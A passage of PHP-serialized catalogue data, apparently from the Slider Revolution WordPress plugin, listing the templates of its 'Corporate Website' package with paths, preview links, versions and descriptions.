Website\";s:5:\"alias\";s:17:\"corporate-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:25:\"corporate-website-package\";s:3:\"img\";s:30:\"packages/corporate-website.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:173:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:347;a:25:{s:2:\"id\";s:3:\"372\";s:5:\"title\";s:16:\"Corporate Header\";s:5:\"alias\";s:16:\"Corporate-Header\";s:3:\"zip\";s:26:\"packs/Corporate-Header.zip\";s:3:\"uid\";s:32:\"04f868e3812a1681f00ab89580e5d1f8\";s:3:\"img\";s:27:\"Corporate-Header/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:348;a:25:{s:2:\"id\";s:3:\"373\";s:5:\"title\";s:24:\"Corporate Welcome Screen\";s:5:\"alias\";s:24:\"Corporate-Welcome-Screen\";s:3:\"zip\";s:34:\"packs/Corporate-Welcome-Screen.zip\";s:3:\"uid\";s:32:\"052afe98ef819f7ace041dbbdb749639\";s:3:\"img\";s:35:\"Corporate-Welcome-Screen/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:173:\"[{\"path\":\"revslider-typewriter-addon\\/revslider-typewriter-addon.php\",\"name\":\"Typewriter AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/typewriter-addon\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:349;a:25:{s:2:\"id\";s:3:\"374\";s:5:\"title\";s:15:\"Corporate About\";s:5:\"alias\";s:15:\"Corporate-About\";s:3:\"zip\";s:25:\"packs/Corporate-About.zip\";s:3:\"uid\";s:32:\"7bf5f8f6d4cc3016cea86289cb46e5b6\";s:3:\"img\";s:26:\"Corporate-About/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:350;a:25:{s:2:\"id\";s:3:\"375\";s:5:\"title\";s:19:\"Corporate Portfolio\";s:5:\"alias\";s:19:\"Corporate-Portfolio\";s:3:\"zip\";s:29:\"packs/Corporate-Portfolio.zip\";s:3:\"uid\";s:32:\"612c2bd784fea81392dda1644a3c3cf3\";s:3:\"img\";s:30:\"Corporate-Portfolio/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:351;a:25:{s:2:\"id\";s:3:\"376\";s:5:\"title\";s:15:\"Corporate Chart\";s:5:\"alias\";s:15:\"Corporate-Chart\";s:3:\"zip\";s:25:\"packs/Corporate-Chart.zip\";s:3:\"uid\";s:32:\"4d27d9b3b2cfcce750e526aafb322a9f\";s:3:\"img\";s:26:\"Corporate-Chart/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:352;a:25:{s:2:\"id\";s:3:\"377\";s:5:\"title\";s:14:\"Corporate News\";s:5:\"alias\";s:14:\"Corporate-News\";s:3:\"zip\";s:24:\"packs/Corporate-News.zip\";s:3:\"uid\";s:32:\"bb65ed57a0d4db795d8b738f0a92f2d7\";s:3:\"img\";s:25:\"Corporate-News/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:353;a:25:{s:2:\"id\";s:3:\"378\";s:5:\"title\";s:16:\"Corporate Hiring\";s:5:\"alias\";s:16:\"Corporate-Hiring\";s:3:\"zip\";s:26:\"packs/Corporate-Hiring.zip\";s:3:\"uid\";s:32:\"136cf1a91604e819089eb3573a6e100a\";s:3:\"img\";s:27:\"Corporate-Hiring/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:354;a:25:{s:2:\"id\";s:3:\"379\";s:5:\"title\";s:22:\"Corporate Testimonials\";s:5:\"alias\";s:22:\"Corporate-Testimonials\";s:3:\"zip\";s:32:\"packs/Corporate-Testimonials.zip\";s:3:\"uid\";s:32:\"b17aec0afdc31e37359cfa406164463c\";s:3:\"img\";s:33:\"Corporate-Testimonials/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:355;a:25:{s:2:\"id\";s:3:\"380\";s:5:\"title\";s:15:\"Corporate Store\";s:5:\"alias\";s:15:\"Corporate-Store\";s:3:\"zip\";s:25:\"packs/Corporate-Store.zip\";s:3:\"uid\";s:32:\"6240b14620ddc634736716e0cdfdeb31\";s:3:\"img\";s:26:\"Corporate-Store/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:356;a:25:{s:2:\"id\";s:3:\"381\";s:5:\"title\";s:17:\"Corporate Support\";s:5:\"alias\";s:17:\"Corporate-Support\";s:3:\"zip\";s:27:\"packs/Corporate-Support.zip\";s:3:\"uid\";s:32:\"9424292a78076ce68c2faf587b26cdad\";s:3:\"img\";s:28:\"Corporate-Support/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"10\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:357;a:25:{s:2:\"id\";s:3:\"382\";s:5:\"title\";s:14:\"Corporate Team\";s:5:\"alias\";s:14:\"Corporate-Team\";s:3:\"zip\";s:24:\"packs/Corporate-Team.zip\";s:3:\"uid\";s:32:\"4fafe469b5a0a2545625c3f6d7ff3b9e\";s:3:\"img\";s:25:\"Corporate-Team/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"11\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:358;a:25:{s:2:\"id\";s:3:\"383\";s:5:\"title\";s:33:\"Corporate Selected Projects Title\";s:5:\"alias\";s:33:\"Corporate-Selected-Projects-Title\";s:3:\"zip\";s:43:\"packs/Corporate-Selected-Projects-Title.zip\";s:3:\"uid\";s:32:\"0ed3c41f51e6bf404c2fe179fa8d8ceb\";s:3:\"img\";s:44:\"Corporate-Selected-Projects-Title/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"12\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:359;a:25:{s:2:\"id\";s:3:\"384\";s:5:\"title\";s:27:\"Corporate Selected Projects\";s:5:\"alias\";s:27:\"Corporate-Selected-Projects\";s:3:\"zip\";s:37:\"packs/Corporate-Selected-Projects.zip\";s:3:\"uid\";s:32:\"1096c78d5f007f3900228a4092515e2e\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"13\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:360;a:25:{s:2:\"id\";s:3:\"385\";s:5:\"title\";s:17:\"Corporate Clients\";s:5:\"alias\";s:17:\"Corporate-Clients\";s:3:\"zip\";s:27:\"packs/Corporate-Clients.zip\";s:3:\"uid\";s:32:\"60fe3a311195bf4dba3e50bd1ab98574\";s:3:\"img\";s:28:\"Corporate-Clients/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"14\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:361;a:25:{s:2:\"id\";s:3:\"386\";s:5:\"title\";s:20:\"Corporate Text Block\";s:5:\"alias\";s:20:\"Corporate-Text-Block\";s:3:\"zip\";s:30:\"packs/Corporate-Text-Block.zip\";s:3:\"uid\";s:32:\"93b68bb23d65fd1028b6b5f6d19b85b5\";s:3:\"img\";s:31:\"Corporate-Text-Block/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"15\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:362;a:25:{s:2:\"id\";s:3:\"387\";s:5:\"title\";s:20:\"Corporate Mobile App\";s:5:\"alias\";s:20:\"Corporate-Mobile-App\";s:3:\"zip\";s:30:\"packs/Corporate-Mobile-App.zip\";s:3:\"uid\";s:32:\"e592369d233bea673403daa15c6e498a\";s:3:\"img\";s:31:\"Corporate-Mobile-App/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"16\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:363;a:25:{s:2:\"id\";s:3:\"388\";s:5:\"title\";s:18:\"Corporate Contacts\";s:5:\"alias\";s:18:\"Corporate-Contacts\";s:3:\"zip\";s:28:\"packs/Corporate-Contacts.zip\";s:3:\"uid\";s:32:\"91ae9488b54b7020f8ae9dfbfd6c563a\";s:3:\"img\";s:29:\"Corporate-Contacts/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate Website\";s:13:\"package_order\";s:2:\"17\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"29\";s:9:\"installed\";b:0;}i:364;a:25:{s:2:\"id\";s:3:\"389\";s:5:\"title\";s:16:\"Corporate Footer\";s:5:\"alias\";s:16:\"Corporate-Footer\";s:3:\"zip\";s:26:\"packs/Corporate-Footer.zip\";s:3:\"uid\";s:32:\"a01df90af203f06194c1a18745d79861\";s:3:\"img\";s:27:\"Corporate-Footer/slide1.jpg\";s:7:\"preview\";s:61:\"https://revolution.themepunch.com/corporate-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:248:\"<span class=\"ttm_content\">The Corporate Template is a collection of useful modules to construct your website. Portfolio, news, clients, team, contact, basic content, etc. There is something for everyone here!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:206:\"<span class=\"ttm_content\"></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:17:\"Corporate 